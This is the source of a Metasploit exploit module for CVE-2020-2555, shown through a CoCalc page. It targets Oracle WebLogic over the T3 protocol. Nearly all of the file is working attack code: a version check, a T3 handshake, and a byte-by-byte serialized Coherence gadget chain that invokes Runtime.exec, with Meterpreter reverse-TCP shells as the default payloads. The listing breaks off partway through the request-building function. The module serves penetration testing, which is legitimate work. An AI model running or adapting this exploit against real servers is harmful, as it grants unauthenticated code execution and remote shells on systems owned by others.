CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11
  include Msf::Exploit::Powershell

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',

19
        'Description' => %q{

20
          There exists a Java object deserialization vulnerability

21
          in multiple versions of WebLogic.

22


23
          Unauthenticated remote code execution can be achieved

24
          by sending a serialized BadAttributeValueExpException object

25
          over the T3 protocol to vulnerable WebLogic servers.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Jang', # Vuln Discovery

30
          'Y4er', # PoC

31
          'Shelby Pace', # Metasploit Module

32
          'Steve Embling' # T3S support

33
        ],

34
        'References' => [

35
          [ 'CVE', '2020-2555' ],

36
          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],

37
          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]

38
        ],

39
        'Platform' => %w[unix linux win],

40
        'Arch' => [ ARCH_X86, ARCH_X64 ],

41
        'Privileged' => false,

42
        'Targets' => [

43
          [

44
            'Windows',

45
            {

46
              'Platform' => 'win',

47
              'Arch' => [ ARCH_X86, ARCH_X64 ],

48
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }

49
            }

50
          ],

51
          [

52
            'Unix',

53
            {

54
              'Platform' => %w[unix linux],

55
              'CmdStagerFlavor' => 'printf',

56
              'Arch' => [ ARCH_X86, ARCH_X64 ],

57
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }

58
            }

59
          ],

60
        ],

61
        'DisclosureDate' => '2020-01-15',

62
        'DefaultTarget' => 0,

63
        'Notes' => {

64
          'Reliability' => [REPEATABLE_SESSION],

65
          'Stability' => [CRASH_SAFE],

66
          'SideEffects' => [IOC_IN_LOGS]

67
        }

68
      )

69
    )

70


71
    register_options([

72
      Opt::RPORT(7001),

73
    ])

74


75
    register_advanced_options([

76
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])

77
    ])

78
  end

79


80
  def check

81
    connect

82


83
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"

84
    sock.put(web_req)

85
    sleep(2)

86
    res = sock.get_once

87


88
    versions = [ Rex::Version.new('12.1.3.0.0'), Rex::Version.new('12.2.1.3.0'), Rex::Version.new('12.2.1.4.0') ]

89


90
    return CheckCode::Unknown('Failed to obtain response from service') unless res

91


92
    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res

93
    return CheckCode::Unknown('Failed to detect WebLogic') unless version

94


95
    @version_no = Rex::Version.new(version)

96
    print_status("WebLogic version detected: #{@version_no}")

97


98
    return CheckCode::Appears if versions.include?(@version_no)

99


100
    CheckCode::Detected('Version of WebLogic is not vulnerable')

101
  ensure

102
    disconnect

103
  end

104


105
  def exploit

106
    connect

107
    print_status('Sending handshake...')

108
    t3_handshake

109


110
    if target.name == 'Windows'

111
      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })

112
      win_obj.prepend('cmd.exe /c ')

113
      win_obj = build_payload_obj(win_obj)

114
      t3_send(win_obj)

115
    else

116
      execute_cmdstager

117
    end

118
  ensure

119
    disconnect

120
  end

121


122
  def t3_handshake

123
    # t3 12.2.1\nAS:255

124
    # \nHL:19\nMS:100000

125
    # 00\n\n

126
    if !datastore['SSL'] || datastore['FORCE_T3']

127
      shake = '7433'

128
    else

129
      shake = '743373'

130
    end

131
    shake << '2031322e322e310a41533a323535'

132
    shake << '0a484c3a31390a4d533a313030303030'

133
    shake << '30300a0a'

134


135
    sock.put([shake].pack('H*'))

136
    sleep(1)

137
    sock.get_once

138
  end

139


140
  # rubocop:disable Metrics/MethodLength

141
  def build_payload_obj(payload_data)

142
    payload_obj = 'aced' # STREAM_MAGIC

143
    payload_obj << '0005' # STREAM_VERSION

144
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

145
    payload_obj << '002e' # Class name length: 46

146
    payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException

147
    payload_obj << '67656d656e742e426164'

148
    payload_obj << '41747472696275746556'

149
    payload_obj << '616c7565457870457863'

150
    payload_obj << '657074696f6e'

151
    payload_obj << 'd4e7daab632d4640' # SerialVersionUID

152
    payload_obj << '020001' # Serialization flag, field num = 1

153
    payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3

154
    payload_obj << '76616c' # Field name: val

155
    payload_obj << '740012' # String, length: 18

156
    payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;

157
    payload_obj << '7872' # end block data, TC_CLASSDESC

158
    payload_obj << '0013' # Class name length: 19

159
    payload_obj << '6a6176612e6c616e672e' # java.lang.Exception

160
    payload_obj << '457863657074696f6e'

161
    payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID

162
    payload_obj << '020000' # Serializable, No fields

163
    payload_obj << '7872' # end block data, TC_CLASSDESC

164
    payload_obj << '0013' # Class name length: 19

165
    payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable

166
    payload_obj << '5468726f7761626c65'

167
    payload_obj << 'd5c635273977b8cb' # SerialVersionUID

168
    payload_obj << '030004' # ?, then 4 fields

169
    payload_obj << '4c0005' # Field type: Object, field name length: 5

170
    payload_obj << '6361757365' # Field name: cause

171
    payload_obj << '740015' # String, length: 21

172
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;

173
    payload_obj << '2f5468726f7761626c653b'

174
    payload_obj << '4c000d' # Field type: Object, field name length: 13

175
    payload_obj << '64657461696c4d657373616765' # Field name: detailMessage

176
    payload_obj << '740012' # String, length: 18

177
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;

178
    payload_obj << '2f537472696e673b'

179
    payload_obj << '5b000a' # Field type: 5b = array, field name length: 10

180
    payload_obj << '737461636b5472616365' # Field name: stackTrace

181
    payload_obj << '74001e' # String, length: 30

182
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;

183
    payload_obj << '672f537461636b547261'

184
    payload_obj << '6365456c656d656e743b'

185
    payload_obj << '4c0014' # Field type: Object, field name length: 20

186
    payload_obj << '73757070726573736564' # Field name: suppressedExceptions

187
    payload_obj << '457863657074696f6e73'

188
    payload_obj << '740010' # String, length: 16

189
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;

190
    payload_obj << '2f4c6973743b'

191
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

192
    payload_obj << '71' # TC_REFERENCE

193
    payload_obj << '007e0008' # handle?

194
    payload_obj << '7075' # TC_NULL, TC_ARRAY

195
    payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30

196
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;

197
    payload_obj << '672e537461636b547261'

198
    payload_obj << '6365456c656d656e743b'

199
    payload_obj << '02462a3c3cfd2239' # SerialVersionUID

200
    payload_obj << '020000' # Serializable, No fields

201
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

202
    payload_obj << '00000001'

203
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

204
    payload_obj << '001b' # Class name length: 27

205
    payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement

206
    payload_obj << '537461636b5472616365'

207
    payload_obj << '456c656d656e74'

208
    payload_obj << '6109c59a2636dd85' # SerialVersionUID

209
    payload_obj << '020004' # Serializable, 4 fields

210
    payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10

211
    payload_obj << '6c696e654e756d626572' # lineNumber

212
    payload_obj << '4c000e' # Field type: Object, field name length: 14

213
    payload_obj << '6465636c6172696e6743'

214
    payload_obj << '6c617373' # declaringClass

215
    payload_obj << '71' # TC_REFERENCE

216
    payload_obj << '007e0005' # handle

217
    payload_obj << '4c0008' # Field type: Object, field name length: 8

218
    payload_obj << '66696c654e616d65' # fileName

219
    payload_obj << '71' # TC_REFERENCE

220
    payload_obj << '007e0005' # handle

221
    payload_obj << '4c000a' # Field type: Object, field name length: 10

222
    payload_obj << '6d6574686f644e616d65' # methodName

223
    payload_obj << '71' # TC_REFERENCE

224
    payload_obj << '007e0005' # handle

225
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

226
    payload_obj << '00000028'

227


228
    class_name = Rex::Text.rand_text_alphanumeric(8..14)

229
    formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join

230


231
    payload_obj << '74' # String

232
    payload_obj << class_name.length.to_s(16).rjust(4, '0')

233
    payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name

234
    payload_obj << '74' # String

235
    payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')

236
    payload_obj << formatted_class # Originally Weblogic_2555.java

237
    payload_obj << '2e6a617661' # .java

238
    payload_obj << '740004' # String, length: 4

239
    payload_obj << '6d61696e' # main

240
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

241
    payload_obj << '0026' # Class name length: 38

242
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList

243
    payload_obj << '436f6c6c656374696f6e'

244
    payload_obj << '7324556e6d6f64696669'

245
    payload_obj << '61626c654c697374'

246
    payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID

247
    payload_obj << '020001' # Serializable, 1 field

248
    payload_obj << '4c0004' # Field type: Object, field name length: 4

249
    payload_obj << '6c697374' # list

250
    payload_obj << '71' # TC_REFERENCE

251
    payload_obj << '007e0007' # handle

252
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

253
    payload_obj << '002c' # Class name length: 44

254
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection

255
    payload_obj << '436f6c6c656374696f6e'

256
    payload_obj << '7324556e6d6f64696669'

257
    payload_obj << '61626c65436f6c6c6563'

258
    payload_obj << '74696f6e'

259
    payload_obj << '19420080cb5ef71e' # SerialVersionUID

260
    payload_obj << '020001' # Serializable, 1 field

261
    payload_obj << '4c0001' # Field type: Object, field name length: 1

262
    payload_obj << '63' # Field name: c

263
    payload_obj << '740016' # String, length: 22

264
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;

265
    payload_obj << '2f436f6c6c656374696f'

266
    payload_obj << '6e3b'

267
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

268
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

269
    payload_obj << '0013' # Class name length: 19

270
    payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList

271
    payload_obj << '41727261794c697374'

272
    payload_obj << '7881d21d99c7619d' # SerialVersionUID

273
    payload_obj << '030001' # ?, 1 field

274
    payload_obj << '490004' # Field type: Integer, field name length: 4

275
    payload_obj << '73697a65' # size

276
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

277
    payload_obj << '00000000'

278
    payload_obj << '7704' # TC_BLOCKDATA, length: 4

279
    payload_obj << '00000000'

280
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE

281
    payload_obj << '007e0015' # handle

282
    payload_obj << '78' # TC_ENDBLOCKDATA

283
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

284
    payload_obj << '0024' # Class name length: 36

285
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter

286
    payload_obj << '6f6c2e7574696c2e6669'

287
    payload_obj << '6c7465722e4c696d6974'

288
    payload_obj << '46696c746572'

289
    payload_obj << limit_filter_uid # SerialVersionUID

290
    payload_obj << '020006' # Serializable, 6 fields

291
    payload_obj << '49000b' # Field type: Integer, field name length: 11

292
    payload_obj << '6d5f635061676553697a65' # m_cPageSize

293
    payload_obj << '490007' # Field type: Integer, field name length: 7

294
    payload_obj << '6d5f6e50616765' # m_nPage

295
    payload_obj << '4c000c' # Field type: Object, field name length: 12

296
    payload_obj << '6d5f636f6d70617261746f72' # m_comparator

297
    payload_obj << '740016' # String, length: 22

298
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;

299
    payload_obj << '2f436f6d70617261746f'

300
    payload_obj << '723b'

301
    payload_obj << '4c0008' # Field type: Object, field name length: 8

302
    payload_obj << '6d5f66696c746572' # m_filter

303
    payload_obj << '74001a' # String, length: 26

304
    payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;

305
    payload_obj << '736f6c2f7574696c2f46'

306
    payload_obj << '696c7465723b'

307
    payload_obj << '4c000f' # Field type: Object, field name length: 15

308
    payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom

309
    payload_obj << '6f74746f6d'

310
    payload_obj << '71' # TC_REFERENCE

311
    payload_obj << '007e0001' # handle

312
    payload_obj << '4c000c' # Field type: Object, field name length: 12

313
    payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop

314
    payload_obj << '71' # TC_REFERENCE

315
    payload_obj << '007e0001' # handle

316


317
    unless @version_no == Rex::Version.new('12.1.3.0.0')

318
      payload_obj << add_class_desc

319
    end

320


321
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

322
    payload_obj << '00000000'

323
    payload_obj << '00000000'

324
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

325
    payload_obj << '002c' # Class name length: 44

326
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor

327
    payload_obj << '6f6c2e7574696c2e6578'

328
    payload_obj << '74726163746f722e4368'

329
    payload_obj << '61696e65644578747261'

330
    payload_obj << '63746f72'

331
    payload_obj << chained_extractor_uid # SerialVersionUID

332
    payload_obj << '020000' # Serializable, no fields

333
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

334
    payload_obj << '0036' # Class name length: 54

335
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor

336
    payload_obj << '6f6c2e7574696c2e6578'

337
    payload_obj << '74726163746f722e4162'

338
    payload_obj << '737472616374436f6d70'

339
    payload_obj << '6f736974654578747261'

340
    payload_obj << '63746f72'

341
    payload_obj << '086b3d8c05690f44' # SerialVersionUID

342
    payload_obj << '020001' # Serializable, 1 field

343
    payload_obj << '5b000c' # Field type: Array, field name length: 12

344
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor

345
    payload_obj << '740023' # String, length: 35

346
    payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;

347
    payload_obj << '6f736f6c2f7574696c2f'

348
    payload_obj << '56616c75654578747261'

349
    payload_obj << '63746f723b'

350
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

351
    payload_obj << '002d' # Class name length: 45

352
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor

353
    payload_obj << '6f6c2e7574696c2e6578'

354
    payload_obj << '74726163746f722e4162'

355
    payload_obj << '73747261637445787472'

356
    payload_obj << '6163746f72'

357
    payload_obj << abstract_extractor_uid # SerialVersionUID

358
    payload_obj << '020001' # Serializable, 1 field

359
    payload_obj << '490009' # Field type: Integer, field name length: 9

360
    payload_obj << '6d5f6e546172676574' # m_nTarget

361
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

362
    payload_obj << '00000000'

363
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

364
    payload_obj << '0032' # Class name length: 50

365
    payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;

366
    payload_obj << '6f736f6c2e7574696c2e'

367
    payload_obj << '657874726163746f722e'

368
    payload_obj << '5265666c656374696f6e'

369
    payload_obj << '457874726163746f723b'

370
    payload_obj << 'dd8b89aed70273ca' # SerialVersionUID

371
    payload_obj << '020000' # Serializable, no fields

372
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

373
    payload_obj << '00000003'

374
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

375
    payload_obj << '002f' # Class name length: 47

376
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor

377
    payload_obj << '6f6c2e7574696c2e6578'

378
    payload_obj << '74726163746f722e5265'

379
    payload_obj << '666c656374696f6e4578'

380
    payload_obj << '74726163746f72'

381
    payload_obj << reflection_extractor_uid # SerialVersionUID

382
    payload_obj << '02000' # Serializable, variable fields orig: 020002

383
    payload_obj << reflect_extract_count

384
    payload_obj << '5b0009' # Field type: Array, field name length: 9

385
    payload_obj << '6d5f616f506172616d' # m_aoParam

386
    payload_obj << '740013' # String, length: 19

387
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;

388
    payload_obj << '672f4f626a6563743b'

389
    payload_obj << add_sect

390
    payload_obj << '4c0009' # Object, length: 9

391
    payload_obj << '6d5f734d6574686f64' # m_sMethod

392
    payload_obj << '71' # TC_REFERENCE

393
    payload_obj << '007e0005' # handle

394
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE

395
    payload_obj << (change_handle? ? '007e001d' : '007e001e')

396
    payload_obj << '00000000'

397
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

398
    payload_obj << '0013' # Class name length: 19

399
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;

400
    payload_obj << '672e4f626a6563743b'

401
    payload_obj << '90ce589f1073296c' # SerialVersionUID

402
    payload_obj << '020000' # Serializable, no fields

403
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

404
    payload_obj << '00000002'

405
    payload_obj << '74000a' # String, length: 10

406
    payload_obj << '67657452756e74696d65' # getRuntime

407
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

408
    payload_obj << '0012' # Class name length: 18

409
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;

410
    payload_obj << '672e436c6173733b'

411
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID

412
    payload_obj << '020000' # Serializable, no fields

413
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

414
    payload_obj << '00000000'

415
    payload_obj << add_tc_null

416
    payload_obj << '740009' # String, length: 9

417
    payload_obj << '6765744d6574686f64' # getMethod

418
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE

419
    payload_obj << (change_handle? ? '007e0021' : '007e0022')

420
    payload_obj << '00000000'

421
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE

422
    payload_obj << (change_handle? ? '007e0024' : '007e0025')

423
    payload_obj << '00000002' # array size: 2

424
    payload_obj << '7075' # TC_NULL, TC_ARRAY

425
    payload_obj << '71' # TC_REFERENCE

426
    payload_obj << (change_handle? ? '007e0024' : '007e0025')

427
    payload_obj << '00000000'

428
    payload_obj << add_tc_null

429
    payload_obj << '740006' # TC_STRING, length: 6

430
    payload_obj << '696e766f6b65' # invoke

431
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE

432
    payload_obj << (change_handle? ? '007e0021' : '007e0022')

433
    payload_obj << '00000000'

434
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE

435
    payload_obj << (change_handle? ? '007e0024' : '007e0025')

436
    payload_obj << '00000001'

437
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

438
    payload_obj << '0013' # Class name length: 19

439
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;

440
    payload_obj << '672e537472696e673b'

441
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID

442
    payload_obj << '020000' # Serializable, no fields

443
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

444
    payload_obj << '00000003'

445


446
    payload_bin = format_payload(payload_data)

447
    payload_obj << payload_bin

448


449
    # Original data

450
    # ---------------------------

451
    # payload_obj << '740007'                             # String, length: 7

452
    # payload_obj << '2f62696e2f7368'                     # /bin/sh

453
    # payload_obj << '740002'                             # String, length: 2

454
    # payload_obj << '2d63'                               # -c

455
    # payload_obj << '740017'                             # String, length: 23

456
    # payload_obj << '746f756368202f746d70'               # touch /tmp/blah_ze_blah

457
    # payload_obj << '2f626c61685f7a655f62'

458
    # payload_obj << '6c6168'

459
    # ---------------------------

460
    payload_obj << add_tc_null

461


462
    payload_obj << '740004' # String, length: 4

463
    payload_obj << '65786563' # exec

464
    payload_obj << '7070' # TC_NULL, TC_NULL

465
    payload_obj << '7672' # TC_CLASS, TC_CLASSDESC

466
    payload_obj << '0011' # Class name length: 17

467
    payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime

468
    payload_obj << '52756e74696d65'

469
    payload_obj << '00000000000000000000'

470
    payload_obj << '00'

471
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

472
  end

473
  # rubocop:enable Metrics/MethodLength

474


475
  def change_handle?

476
    @version_no == Rex::Version.new('12.1.3.0.0')

477
  end

478


479
  def limit_filter_uid

480
    case @version_no

481
    when Rex::Version.new('12.1.3.0.0')

482
      '99022596d7b45953'

483
    when Rex::Version.new('12.2.1.3.0')

484
      'ab2901b976c4e271'

485
    else

486
      '954e4590be89865f'

487
    end

488
  end

489


490
  def chained_extractor_uid

491
    case @version_no

492
    when Rex::Version.new('12.1.3.0.0')

493
      '889f81b0945d5b7f'

494
    when Rex::Version.new('12.2.1.3.0')

495
      '06ee10433a4cc4b4'

496
    else

497
      '435b250b72f63db5'

498
    end

499
  end

500


501
  def abstract_extractor_uid

502
    case @version_no

503
    when Rex::Version.new('12.1.3.0.0')

504
      '658195303e723821'

505
    when Rex::Version.new('12.2.1.3.0')

506
      '752289ad4d460138'

507
    else

508
      '9b1be18ed70100e5'

509
    end

510
  end

511


512
  def reflection_extractor_uid

513
    case @version_no

514
    when Rex::Version.new('12.1.3.0.0')

515
      'ee7ae995c02fb4a2'

516
    when Rex::Version.new('12.2.1.3.0')

517
      '87973791b26429dd'

518
    else

519
      '1f62f564b951b614'

520
    end

521
  end

522


523
  def reflect_extract_count

524
    case @version_no

525
    when Rex::Version.new('12.2.1.3.0')

526
      '3'

527
    else

528
      '2'

529
    end

530
  end

531


532
  def add_sect

533
    sect = ''

534


535
    if @version_no == Rex::Version.new('12.2.1.3.0')

536
      sect << '4c0011' # Object, length: 17

537
      sect << '6d5f657874726163746f' # m_extractorCached

538
      sect << '72436163686564'

539
      sect << '71' # TC_REFERENCE

540
      sect << '007e0001' # handle

541
    end

542


543
    sect

544
  end

545


546
  def add_class_desc

547
    class_desc = ''

548
    class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

549
    class_desc << '0034' # Class name length: 52

550
    class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter

551
    class_desc << '6f6c2e7574696c2e6669'

552
    class_desc << '6c7465722e4162737472'

553
    class_desc << '61637451756572795265'

554
    class_desc << '636f7264657246696c74'

555
    class_desc << '6572'

556
    class_desc << 'f3b98201f680eb90' # SerialVersionUID

557
    class_desc << '020000' # Serializable, no fields

558
  end

559


560
  def add_tc_null

561
    return '70' if @version_no == Rex::Version.new('12.2.1.3.0')

562


563
    ''

564
  end

565


566
  def t3_send(payload_obj)

567
    print_status('Sending object...')

568


569
    request_obj = '000009f3' # Original packet length

570
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags

571
    request_obj << 'ffffffffffffffff'

572
    request_obj << '00000071'

573
    request_obj << '0000ea60'

574
    request_obj << '00000018432ec6'

575
    request_obj << 'a2a63985b5af7d63e643'

576
    request_obj << '83f42a6d92c9e9af0f94'

577
    request_obj << '72027973720078720178'

578
    request_obj << '720278700000000c0000'

579
    request_obj << '00020000000000000000'

580
    request_obj << '00000001007070707070'

581
    request_obj << '700000000c0000000200'

582
    request_obj << '00000000000000000000'

583
    request_obj << '01007006'

584
    request_obj << 'fe010000' # separator

585
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

586
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

587
    request_obj << '001d' # Class name length: 29

588
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry

589
    request_obj << '6a766d2e436c61737354'

590
    request_obj << '61626c65456e747279'

591
    request_obj << '2f52658157f4f9ed' # SerialVersionUID

592
    request_obj << '0c0000' # flags?

593
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC

594
    request_obj << '0024' # Class name length: 36

595
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo

596
    request_obj << '6f6d6d6f6e2e696e7465'

597
    request_obj << '726e616c2e5061636b61'

598
    request_obj << '6765496e666f'

599
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID

600
    request_obj << '020009' # Serializable, 9 fields

601
    request_obj << '490005' # Field type: Int, field name length: 5

602
    request_obj << '6d616a6f72' # major

603
    request_obj << '490005' # Field type: Int, field name length: 5

604
    request_obj << '6d696e6f72' # minor

605
    request_obj << '49000b' # Field type: Int, field name length: 11

606
    request_obj << '70617463685570646174' # patchUpdate

607
    request_obj << '65'

608
    request_obj << '49000c' # Field type: Int, field name length: 12

609
    request_obj << '726f6c6c696e67506174' # rollingPatch

610
    request_obj << '6368'

611
    request_obj << '49000b' # Field type: Int, field name length: 11

612
    request_obj << '73657276696365506163' # servicePack

613
    request_obj << '6b'

614
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

615
    request_obj << '74656d706f7261727950' # temporaryPatch

616
    request_obj << '61746368'

617
    request_obj << '4c0009' # Field type: Object, field name length: 9

618
    request_obj << '696d706c5469746c65' # implTitle

619
    request_obj << '740012' # String, length: 18

620
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;

621
    request_obj << '2f537472696e673b'

622
    request_obj << '4c000a' # Field type: Object, field name length: 10

623
    request_obj << '696d706c56656e646f72' # implVendor

624
    request_obj << '71007e0003' # TC_REFERENCE, handle

625
    request_obj << '4c000b' # Field type: Object, field name length: 11

626
    request_obj << '696d706c56657273696f6e' # implVersion

627
    request_obj << '71007e0003' # TC_REFERENCE, handle

628
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

629
    request_obj << '7702' # TC_ENDBLOCKDATA

630
    request_obj << '000078'

631
    request_obj << 'fe010000' # separator

632


633
    request_obj << payload_obj

634


635
    request_obj << 'fe010000' # separator

636
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

637
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

638
    request_obj << '001d' # Class name length: 29

639
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry

640
    request_obj << '6a766d2e436c61737354'

641
    request_obj << '61626c65456e747279'

642
    request_obj << '2f52658157f4f9ed' # SerialVersionUID

643
    request_obj << '0c0000'

644
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC

645
    request_obj << '0021' # Class name length: 33

646
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo

647
    request_obj << '6f6d6d6f6e2e696e7465'

648
    request_obj << '726e616c2e5065657249'

649
    request_obj << '6e666f'

650
    request_obj << '585474f39bc908f1' # SerialVersionUID

651
    request_obj << '020007' # Serializable, 7 fields

652
    request_obj << '490005' # Field type: Int, field name length: 5

653
    request_obj << '6d616a6f72' # major

654
    request_obj << '490005' # Field type: Int, field name length: 5

655
    request_obj << '6d696e6f72' # minor

656
    request_obj << '49000b' # Field type: Int, field name length: 11

657
    request_obj << '70617463685570646174' # patchUpdate

658
    request_obj << '65'

659
    request_obj << '49000c' # Field type: Int, field name length: 12

660
    request_obj << '726f6c6c696e67506174' # rollingPatch

661
    request_obj << '6368'

662
    request_obj << '49000b' # Field type: Int, field name length: 11

663
    request_obj << '73657276696365506163' # servicePack

664
    request_obj << '6b'

665
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

666
    request_obj << '74656d706f7261727950' # temporaryPatch

667
    request_obj << '61746368'

668
    request_obj << '5b0008' # Field type: Array, field name length: 8

669
    request_obj << '7061636b61676573' # packages

670
    request_obj << '740027' # String, length: 39

671
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;

672
    request_obj << '2f636f6d6d6f6e2f696e'

673
    request_obj << '7465726e616c2f506163'

674
    request_obj << '6b616765496e666f3b'

675
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

676
    request_obj << '0024' # Class name length: 36

677
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo

678
    request_obj << '6f6d6d6f6e2e696e7465'

679
    request_obj << '726e616c2e5665727369'

680
    request_obj << '6f6e496e666f'

681
    request_obj << '972245516452463e' # SerialVersionUID

682
    request_obj << '020003' # Serializable, 3 fields

683
    request_obj << '5b0008' # Field type: Array, field name length: 8

684
    request_obj << '7061636b61676573' # packages

685
    request_obj << '71007e0003' # TC_REFERENCE, handle

686
    request_obj << '4c000e' # Field type: Object, field name length: 14

687
    request_obj << '72656c65617365566572' # releaseVersion

688
    request_obj << '73696f6e'

689
    request_obj << '740012' # String, length: 18

690
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;

691
